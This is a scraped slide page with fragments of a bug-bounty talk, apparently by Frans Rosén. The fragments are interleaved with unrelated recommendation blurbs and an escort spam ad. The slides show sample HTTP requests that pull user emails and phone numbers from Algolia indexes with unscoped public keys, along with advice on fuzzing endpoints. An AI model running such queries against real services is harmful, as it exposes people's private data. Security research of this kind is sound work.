Software Engineering and Project Management - Introduction to Project ManagementSoftware Engineering and Project Management - Introduction to Project Management
Software Engineering and Project Management - Introduction to Project Management

Introduction to Project Management: Introduction, Project and Importance of Project Management, Contract Management, Activities Covered by Software Project Management, Plans, Methods and Methodologies, some ways of categorizing Software Projects, Stakeholders, Setting Objectives, Business Case, Project Success and Failure, Management and Management Control, Project Management life cycle, Traditional versus Modern Project Management Practices.

project managementcontract managementmanagement
Biology for computer science BBOC407 vtu
Biology for computer science BBOC407 vtuBiology for computer science BBOC407 vtu
Biology for computer science BBOC407 vtu

BBOC407

FRANS ROSÉN
POST /1/indexes/publicdb/query?x-
algolia-application-id=AppID&x-
algolia-api-key=PublicApiKey HTTP/1.1
Host: AppId-dsn.algolia.net
{"params":"query=*&hitsPerPage=1"}
Algolia API call
FRANS ROSÉN
HTTP/1.1 200 OK
{"result": [
{"id": 123, "user": "x"},
…
]}
POST /1/indexes/publicdb/query
FRANS ROSÉN
POST /1/indexes/userdb/query?x-
algolia-api-key=PublicApiKey&…
{"params":"query=*&hitsPerPage=1"}
Try another index + Scoped API-key
FRANS ROSÉN
POST /1/indexes/userdb/query?x-
algolia-api-key=PublicApiKey&…
{"message":"Index not allowed with
this API key","status":403}
Try another index + Scoped API-key

Recommended for you

IS Code SP 23: Handbook on concrete mixes
IS Code SP 23: Handbook  on concrete mixesIS Code SP 23: Handbook  on concrete mixes
IS Code SP 23: Handbook on concrete mixes

SP-23: Hand Bank on Concrete Mixes required at the time designing

sp-23: hand bank of concrete
21EC63_Module1B.pptx VLSI design 21ec63 MOS TRANSISTOR THEORY
21EC63_Module1B.pptx VLSI design 21ec63 MOS TRANSISTOR THEORY21EC63_Module1B.pptx VLSI design 21ec63 MOS TRANSISTOR THEORY
21EC63_Module1B.pptx VLSI design 21ec63 MOS TRANSISTOR THEORY

VLSI design 21ec63 MOS TRANSISTOR THEORY

22519 - Client-Side Scripting Language (CSS) chapter 1 notes .pdf
22519 - Client-Side Scripting Language (CSS) chapter 1 notes .pdf22519 - Client-Side Scripting Language (CSS) chapter 1 notes .pdf
22519 - Client-Side Scripting Language (CSS) chapter 1 notes .pdf

CSS chapter 1 notes

FRANS ROSÉN
POST /1/indexes/userdb/query?x-
algolia-api-
key=AnotherPublicApiKey&…
{"params":"query=*&hitsPerPage=1"}
Unscoped API-key
FRANS ROSÉN
HTTP/1.1 200 OK
{"result": [
{"id": 123, "user": "x", "email":
"secret@x.com", "phone": "003234234.."},
…
]}
Another index with sensitive data
FRANS ROSÉN
HTTP/1.1 200 OK
{"result": [
{"id": 123, "user": "x", "email":
"secret@x.com", "phone": "003234234.."},
…
]}
Another index with sensitive data
FRANS ROSÉN
"Emails + phone for all users disclosed
due to sensitive data in public AlgoliaDB"
HTTP/1.1 200 OK
{"result": [
{"id": 123, "user": "x", "email":
"secret@x.com", "phone": "003234234.."},
…
]}

Recommended for you

LeetCode Database problems solved using PySpark.pdf
LeetCode Database problems solved using PySpark.pdfLeetCode Database problems solved using PySpark.pdf
LeetCode Database problems solved using PySpark.pdf

Pyspark

Phone Us ❤ X000XX000X ❤ #ℂall #gIRLS In Chennai By Chenai @ℂall @Girls Hotel ...
Phone Us ❤ X000XX000X ❤ #ℂall #gIRLS In Chennai By Chenai @ℂall @Girls Hotel ...Phone Us ❤ X000XX000X ❤ #ℂall #gIRLS In Chennai By Chenai @ℂall @Girls Hotel ...
Phone Us ❤ X000XX000X ❤ #ℂall #gIRLS In Chennai By Chenai @ℂall @Girls Hotel ...

For Ad Post Contact :- adityaroy0215@gmail.com Phone Us ❤ X000XX000X ❤ #ℂall #gIRLS In Chennai By Chenai @ℂall @Girls Hotel With 100% Satisfaction

Net Zero Case Study: SRK House and SRK Empire
Net Zero Case Study: SRK House and SRK EmpireNet Zero Case Study: SRK House and SRK Empire
Net Zero Case Study: SRK House and SRK Empire

In May 2024, globally renowned natural diamond crafting company Shree Ramkrishna Exports Pvt. Ltd. (SRK) became the first company in the world to achieve GNFZ’s final net zero certification for existing buildings, for its two two flagship crafting facilities SRK House and SRK Empire. Initially targeting 2030 to reach net zero, SRK joined forces with the Global Network for Zero (GNFZ) to accelerate its target to 2024 — a trailblazing achievement toward emissions elimination.

energybuildingconstruction
FRANS ROSÉN
What we might find
• Keys or tokens expected to be secrets

Third party apps with unclear docs if tokens should be secrets.
• Secret ENV variables dumped in CI-minification

If any minifications or 



Example of this happening IRL!

FRANS ROSÉN
What we might find
FRANS ROSÉN
What we might find
FRANS ROSÉN
What we might find

Recommended for you

GUIA_LEGAL_CHAPTER-9_COLOMBIAN ELECTRICITY (1).pdf
GUIA_LEGAL_CHAPTER-9_COLOMBIAN ELECTRICITY (1).pdfGUIA_LEGAL_CHAPTER-9_COLOMBIAN ELECTRICITY (1).pdf
GUIA_LEGAL_CHAPTER-9_COLOMBIAN ELECTRICITY (1).pdf

Energy market

Introduction to IP address concept - Computer Networking
Introduction to IP address concept - Computer NetworkingIntroduction to IP address concept - Computer Networking
Introduction to IP address concept - Computer Networking

An Internet Protocol address (IP address) is a logical numeric address that is assigned to every single computer, printer, switch, router, tablets, smartphones or any other device that is part of a TCP/IP-based network. Types of IP address- Dynamic means "constantly changing “ .dynamic IP addresses aren't more powerful, but they can change. Static means staying the same. Static. Stand. Stable. Yes, static IP addresses don't change. Most IP addresses assigned today by Internet Service Providers are dynamic IP addresses. It's more cost effective for the ISP and you.

networkinginternetcommunication
Online music portal management system project report.pdf
Online music portal management system project report.pdfOnline music portal management system project report.pdf
Online music portal management system project report.pdf

The iMMS is a unique application that is synchronizing both user experience and copyrights while providing services like online music management, legal downloads, artists’ management. There are several other applications available in the market that either provides some specific services or large scale integrated solutions. Our product differs from the rest in a way that we give more power to the users remaining within the copyrights circle.

computer technologyscience and technologyproject management
FRANS ROSÉN
FRANS ROSÉN
Ways forward
1.Locate all APIs/micro-services used
2.Extract all API-endpoints we can find
3.Look at other strings in JS-files
4.Create wordlists
FRANS ROSÉN
Wordlists!
• For every program:
FRANS ROSÉN
Wordlists!
• For every program:
• Build / combine

Recommended for you

FRANS ROSÉN
Wordlists!
• For every program:
• Build / combine
FRANS ROSÉN
Wordlists!
• For every program:
• Build / combine
FRANS ROSÉN
Wordlists!
• For every program:
• Build / combine
• Apply context!
FRANS ROSÉN
Wordlists!
• For every program:
• Build / combine
• Apply context!
/api/v1/payment
/api/v1/payment-methods
/api/v1/shipping

Recommended for you

FRANS ROSÉN
Wordlists!
• For every program:
• Build / combine
• Apply context!
/api/v1/payment
/api/v1/payment-methods
/api/v1/shipping
/api/v1/shipping-methods
Also add this
FRANS ROSÉN
Ways forward
1.Locate all APIs/micro-services used
2.Extract all API-endpoints we can find
3.Look at other strings in JS-files
4.Create wordlists
5.Fuzz, fuzz, fuzz
FRANS ROSÉN
Fuzz with / without
• All HTTP-methods POST PATCH DELETE PUT…
• IDs or not /users/1 vs /users
• / in the end /payments/ vs /payments
• File extension users.json vs users
FRANS ROSÉN
Fuzz combination
• Again, combine paths + endpoints on subdomains
• Skip paths, try all methods, add regular fuzz
characters:  " ' & # .. ö % ? NULL

Recommended for you

FRANS ROSÉN
• Curate your own context specific wordlists
Takeaways
FRANS ROSÉN
• Curate your own context specific wordlists
• Combine with regular fuzzing
Takeaways
FRANS ROSÉN
• Curate your own context specific wordlists
• Combine with regular fuzzing
• Understand and learn what is being disclosed

and how to abuse it.
Takeaways
FRANS ROSÉN
Takeaways
That’s it, thank you!

Any questions?
• Curate your own context specific wordlists
• Combine with regular fuzzing
• Understand and learn what is being disclosed

and how to abuse it.

Recommended for you

More Related Content

What's hot

Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
HackIT Ukraine
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification needed
Frans Rosén
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Rob Fuller
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
bugcrowd
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
Frans Rosén
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
Mikhail Egorov
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
Дмитрий Бумов
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
Frans Rosén
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
Mikhail Egorov
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
Soroush Dalili
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
GarethHeyes
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications security
Mikhail Egorov
 
Hack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydHack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhyd
n|u - The Open Security Community
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
Masato Kinugawa
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
Avinash Thapa
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
OWASP Nagpur
 

What's hot (20)

Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification needed
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications security
 
Hack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydHack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhyd
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 

Similar to Frans Rosén Keynote at BSides Ahmedabad

Eyeing the Onion
Eyeing the OnionEyeing the Onion
Eyeing the Onion
bsidesaugusta
 
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
Anna Klepacka
 
REST API Pentester's perspective
REST API Pentester's perspectiveREST API Pentester's perspective
REST API Pentester's perspective
SecuRing
 
LibreSSL, one year later
LibreSSL, one year laterLibreSSL, one year later
LibreSSL, one year later
Giovanni Bechis
 
Web API Security
Web API SecurityWeb API Security
Web API Security
Stefaan
 
FOXX - a Javascript application framework on top of ArangoDB
FOXX - a Javascript application framework on top of ArangoDBFOXX - a Javascript application framework on top of ArangoDB
FOXX - a Javascript application framework on top of ArangoDB
ArangoDB Database
 
Hypermedia: The Missing Element to Building Adaptable Web APIs in Rails
Hypermedia: The Missing Element to Building Adaptable Web APIs in RailsHypermedia: The Missing Element to Building Adaptable Web APIs in Rails
Hypermedia: The Missing Element to Building Adaptable Web APIs in Rails
Toru Kawamura
 
RoR Workshop - Web applications hacking - Ruby on Rails example
RoR Workshop - Web applications hacking - Ruby on Rails exampleRoR Workshop - Web applications hacking - Ruby on Rails example
RoR Workshop - Web applications hacking - Ruby on Rails example
Railwaymen
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
bhumika2108
 
Serverless in production, an experience report (Going Serverless)
Serverless in production, an experience report (Going Serverless)Serverless in production, an experience report (Going Serverless)
Serverless in production, an experience report (Going Serverless)
Yan Cui
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
Chris Gates
 
Building Awesome APIs in Grails
Building Awesome APIs in GrailsBuilding Awesome APIs in Grails
Building Awesome APIs in Grails
clatimer
 
Designing & Building Secure Web APIs
Designing & Building Secure Web APIsDesigning & Building Secure Web APIs
Designing & Building Secure Web APIs
CodeOps Technologies LLP
 
Serverless in production, an experience report (JeffConf)
Serverless in production, an experience report (JeffConf)Serverless in production, an experience report (JeffConf)
Serverless in production, an experience report (JeffConf)
Yan Cui
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
Caleb Sima
 
Building websites with Node.ACS
Building websites with Node.ACSBuilding websites with Node.ACS
Building websites with Node.ACS
ralcocer
 
Building websites with Node.ACS
Building websites with Node.ACSBuilding websites with Node.ACS
Building websites with Node.ACS
Ricardo Alcocer
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
 
Who pulls the strings?
Who pulls the strings?Who pulls the strings?
Who pulls the strings?
Ronny
 
Building CI/CD Pipelines for Serverless Applications - SRV302 - re:Invent 2017
Building CI/CD Pipelines for Serverless Applications - SRV302 - re:Invent 2017Building CI/CD Pipelines for Serverless Applications - SRV302 - re:Invent 2017
Building CI/CD Pipelines for Serverless Applications - SRV302 - re:Invent 2017
Amazon Web Services
 

Similar to Frans Rosén Keynote at BSides Ahmedabad (20)

Eyeing the Onion
Eyeing the OnionEyeing the Onion
Eyeing the Onion
 
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
 
REST API Pentester's perspective
REST API Pentester's perspectiveREST API Pentester's perspective
REST API Pentester's perspective
 
LibreSSL, one year later
LibreSSL, one year laterLibreSSL, one year later
LibreSSL, one year later
 
Web API Security
Web API SecurityWeb API Security
Web API Security
 
FOXX - a Javascript application framework on top of ArangoDB
FOXX - a Javascript application framework on top of ArangoDBFOXX - a Javascript application framework on top of ArangoDB
FOXX - a Javascript application framework on top of ArangoDB
 
Hypermedia: The Missing Element to Building Adaptable Web APIs in Rails
Hypermedia: The Missing Element to Building Adaptable Web APIs in RailsHypermedia: The Missing Element to Building Adaptable Web APIs in Rails
Hypermedia: The Missing Element to Building Adaptable Web APIs in Rails
 
RoR Workshop - Web applications hacking - Ruby on Rails example
RoR Workshop - Web applications hacking - Ruby on Rails exampleRoR Workshop - Web applications hacking - Ruby on Rails example
RoR Workshop - Web applications hacking - Ruby on Rails example
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
 
Serverless in production, an experience report (Going Serverless)
Serverless in production, an experience report (Going Serverless)Serverless in production, an experience report (Going Serverless)
Serverless in production, an experience report (Going Serverless)
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
 
Building Awesome APIs in Grails
Building Awesome APIs in GrailsBuilding Awesome APIs in Grails
Building Awesome APIs in Grails
 
Designing & Building Secure Web APIs
Designing & Building Secure Web APIsDesigning & Building Secure Web APIs
Designing & Building Secure Web APIs
 
Serverless in production, an experience report (JeffConf)
Serverless in production, an experience report (JeffConf)Serverless in production, an experience report (JeffConf)
Serverless in production, an experience report (JeffConf)
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
Building websites with Node.ACS
Building websites with Node.ACSBuilding websites with Node.ACS
Building websites with Node.ACS
 
Building websites with Node.ACS
Building websites with Node.ACSBuilding websites with Node.ACS
Building websites with Node.ACS
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Who pulls the strings?
Who pulls the strings?Who pulls the strings?
Who pulls the strings?
 
Building CI/CD Pipelines for Serverless Applications - SRV302 - re:Invent 2017
Building CI/CD Pipelines for Serverless Applications - SRV302 - re:Invent 2017Building CI/CD Pipelines for Serverless Applications - SRV302 - re:Invent 2017
Building CI/CD Pipelines for Serverless Applications - SRV302 - re:Invent 2017
 

Recently uploaded

kiln burning and kiln burner system for clinker
kiln burning and kiln burner system for clinkerkiln burning and kiln burner system for clinker
kiln burning and kiln burner system for clinker
hamedmustafa094
 
SCADAmetrics Instrumentation for Sensus Water Meters - Core and Main Training...
SCADAmetrics Instrumentation for Sensus Water Meters - Core and Main Training...SCADAmetrics Instrumentation for Sensus Water Meters - Core and Main Training...
SCADAmetrics Instrumentation for Sensus Water Meters - Core and Main Training...
Jim Mimlitz, P.E.
 
Response & Safe AI at Summer School of AI at IIITH
Response & Safe AI at Summer School of AI at IIITHResponse & Safe AI at Summer School of AI at IIITH
Response & Safe AI at Summer School of AI at IIITH
IIIT Hyderabad
 
Press Tool and It's Primary Components.pdf
Press Tool and It's Primary Components.pdfPress Tool and It's Primary Components.pdf
Press Tool and It's Primary Components.pdf
Tool and Die Tech
 
L-3536-Cost Benifit Analysis in ESIA.pptx
L-3536-Cost Benifit Analysis in ESIA.pptxL-3536-Cost Benifit Analysis in ESIA.pptx
L-3536-Cost Benifit Analysis in ESIA.pptx
naseki5964
 
CCS367-STORAGE TECHNOLOGIES QUESTION BANK.doc
CCS367-STORAGE TECHNOLOGIES QUESTION BANK.docCCS367-STORAGE TECHNOLOGIES QUESTION BANK.doc
CCS367-STORAGE TECHNOLOGIES QUESTION BANK.doc
Dss
 
Quadcopter Dynamics, Stability and Control
Quadcopter Dynamics, Stability and ControlQuadcopter Dynamics, Stability and Control
Quadcopter Dynamics, Stability and Control
Blesson Easo Varghese
 
Germany Offshore Wind 010724 RE (1) 2 test.pptx
Germany Offshore Wind 010724 RE (1) 2 test.pptxGermany Offshore Wind 010724 RE (1) 2 test.pptx
Germany Offshore Wind 010724 RE (1) 2 test.pptx
rebecca841358
 
PMSM-Motor-Control : A research about FOC
PMSM-Motor-Control : A research about FOCPMSM-Motor-Control : A research about FOC
PMSM-Motor-Control : A research about FOC
itssurajthakur06
 
Software Engineering and Project Management - Introduction to Project Management
Software Engineering and Project Management - Introduction to Project ManagementSoftware Engineering and Project Management - Introduction to Project Management
Software Engineering and Project Management - Introduction to Project Management
Prakhyath Rai
 
Biology for computer science BBOC407 vtu
Biology for computer science BBOC407 vtuBiology for computer science BBOC407 vtu
Biology for computer science BBOC407 vtu
santoshpatilrao33
 
IS Code SP 23: Handbook on concrete mixes
IS Code SP 23: Handbook  on concrete mixesIS Code SP 23: Handbook  on concrete mixes
IS Code SP 23: Handbook on concrete mixes
Mani Krishna Sarkar
 
21EC63_Module1B.pptx VLSI design 21ec63 MOS TRANSISTOR THEORY
21EC63_Module1B.pptx VLSI design 21ec63 MOS TRANSISTOR THEORY21EC63_Module1B.pptx VLSI design 21ec63 MOS TRANSISTOR THEORY
21EC63_Module1B.pptx VLSI design 21ec63 MOS TRANSISTOR THEORY
PradeepKumarSK3
 
22519 - Client-Side Scripting Language (CSS) chapter 1 notes .pdf
22519 - Client-Side Scripting Language (CSS) chapter 1 notes .pdf22519 - Client-Side Scripting Language (CSS) chapter 1 notes .pdf
22519 - Client-Side Scripting Language (CSS) chapter 1 notes .pdf
sharvaridhokte
 
LeetCode Database problems solved using PySpark.pdf
LeetCode Database problems solved using PySpark.pdfLeetCode Database problems solved using PySpark.pdf
LeetCode Database problems solved using PySpark.pdf
pavanaroshni1977
 
Phone Us ❤ X000XX000X ❤ #ℂall #gIRLS In Chennai By Chenai @ℂall @Girls Hotel ...
Phone Us ❤ X000XX000X ❤ #ℂall #gIRLS In Chennai By Chenai @ℂall @Girls Hotel ...Phone Us ❤ X000XX000X ❤ #ℂall #gIRLS In Chennai By Chenai @ℂall @Girls Hotel ...
Phone Us ❤ X000XX000X ❤ #ℂall #gIRLS In Chennai By Chenai @ℂall @Girls Hotel ...
Miss Khusi #V08
 
Net Zero Case Study: SRK House and SRK Empire
Net Zero Case Study: SRK House and SRK EmpireNet Zero Case Study: SRK House and SRK Empire
Net Zero Case Study: SRK House and SRK Empire
Global Network for Zero
 
GUIA_LEGAL_CHAPTER-9_COLOMBIAN ELECTRICITY (1).pdf
GUIA_LEGAL_CHAPTER-9_COLOMBIAN ELECTRICITY (1).pdfGUIA_LEGAL_CHAPTER-9_COLOMBIAN ELECTRICITY (1).pdf
GUIA_LEGAL_CHAPTER-9_COLOMBIAN ELECTRICITY (1).pdf
ProexportColombia1
 
Introduction to IP address concept - Computer Networking
Introduction to IP address concept - Computer NetworkingIntroduction to IP address concept - Computer Networking
Introduction to IP address concept - Computer Networking
Md.Shohel Rana ( M.Sc in CSE Khulna University of Engineering & Technology (KUET))
 
Online music portal management system project report.pdf
Online music portal management system project report.pdfOnline music portal management system project report.pdf
Online music portal management system project report.pdf
Kamal Acharya
 

Recently uploaded (20)

kiln burning and kiln burner system for clinker
kiln burning and kiln burner system for clinkerkiln burning and kiln burner system for clinker
kiln burning and kiln burner system for clinker
 
SCADAmetrics Instrumentation for Sensus Water Meters - Core and Main Training...
SCADAmetrics Instrumentation for Sensus Water Meters - Core and Main Training...SCADAmetrics Instrumentation for Sensus Water Meters - Core and Main Training...
SCADAmetrics Instrumentation for Sensus Water Meters - Core and Main Training...
 
Response & Safe AI at Summer School of AI at IIITH
Response & Safe AI at Summer School of AI at IIITHResponse & Safe AI at Summer School of AI at IIITH
Response & Safe AI at Summer School of AI at IIITH
 
Press Tool and It's Primary Components.pdf
Press Tool and It's Primary Components.pdfPress Tool and It's Primary Components.pdf
Press Tool and It's Primary Components.pdf
 
L-3536-Cost Benifit Analysis in ESIA.pptx
L-3536-Cost Benifit Analysis in ESIA.pptxL-3536-Cost Benifit Analysis in ESIA.pptx
L-3536-Cost Benifit Analysis in ESIA.pptx
 
CCS367-STORAGE TECHNOLOGIES QUESTION BANK.doc
CCS367-STORAGE TECHNOLOGIES QUESTION BANK.docCCS367-STORAGE TECHNOLOGIES QUESTION BANK.doc
CCS367-STORAGE TECHNOLOGIES QUESTION BANK.doc
 
Quadcopter Dynamics, Stability and Control
Quadcopter Dynamics, Stability and ControlQuadcopter Dynamics, Stability and Control
Quadcopter Dynamics, Stability and Control
 
Germany Offshore Wind 010724 RE (1) 2 test.pptx
Germany Offshore Wind 010724 RE (1) 2 test.pptxGermany Offshore Wind 010724 RE (1) 2 test.pptx
Germany Offshore Wind 010724 RE (1) 2 test.pptx
 
PMSM-Motor-Control : A research about FOC
PMSM-Motor-Control : A research about FOCPMSM-Motor-Control : A research about FOC
PMSM-Motor-Control : A research about FOC
 
Software Engineering and Project Management - Introduction to Project Management
Software Engineering and Project Management - Introduction to Project ManagementSoftware Engineering and Project Management - Introduction to Project Management
Software Engineering and Project Management - Introduction to Project Management
 
Biology for computer science BBOC407 vtu
Biology for computer science BBOC407 vtuBiology for computer science BBOC407 vtu
Biology for computer science BBOC407 vtu
 
IS Code SP 23: Handbook on concrete mixes
IS Code SP 23: Handbook  on concrete mixesIS Code SP 23: Handbook  on concrete mixes
IS Code SP 23: Handbook on concrete mixes
 
21EC63_Module1B.pptx VLSI design 21ec63 MOS TRANSISTOR THEORY
21EC63_Module1B.pptx VLSI design 21ec63 MOS TRANSISTOR THEORY21EC63_Module1B.pptx VLSI design 21ec63 MOS TRANSISTOR THEORY
21EC63_Module1B.pptx VLSI design 21ec63 MOS TRANSISTOR THEORY
 
22519 - Client-Side Scripting Language (CSS) chapter 1 notes .pdf
22519 - Client-Side Scripting Language (CSS) chapter 1 notes .pdf22519 - Client-Side Scripting Language (CSS) chapter 1 notes .pdf
22519 - Client-Side Scripting Language (CSS) chapter 1 notes .pdf
 
LeetCode Database problems solved using PySpark.pdf
LeetCode Database problems solved using PySpark.pdfLeetCode Database problems solved using PySpark.pdf
LeetCode Database problems solved using PySpark.pdf
 
Phone Us ❤ X000XX000X ❤ #ℂall #gIRLS In Chennai By Chenai @ℂall @Girls Hotel ...
Phone Us ❤ X000XX000X ❤ #ℂall #gIRLS In Chennai By Chenai @ℂall @Girls Hotel ...Phone Us ❤ X000XX000X ❤ #ℂall #gIRLS In Chennai By Chenai @ℂall @Girls Hotel ...
Phone Us ❤ X000XX000X ❤ #ℂall #gIRLS In Chennai By Chenai @ℂall @Girls Hotel ...
 
Net Zero Case Study: SRK House and SRK Empire
Net Zero Case Study: SRK House and SRK EmpireNet Zero Case Study: SRK House and SRK Empire
Net Zero Case Study: SRK House and SRK Empire
 
GUIA_LEGAL_CHAPTER-9_COLOMBIAN ELECTRICITY (1).pdf
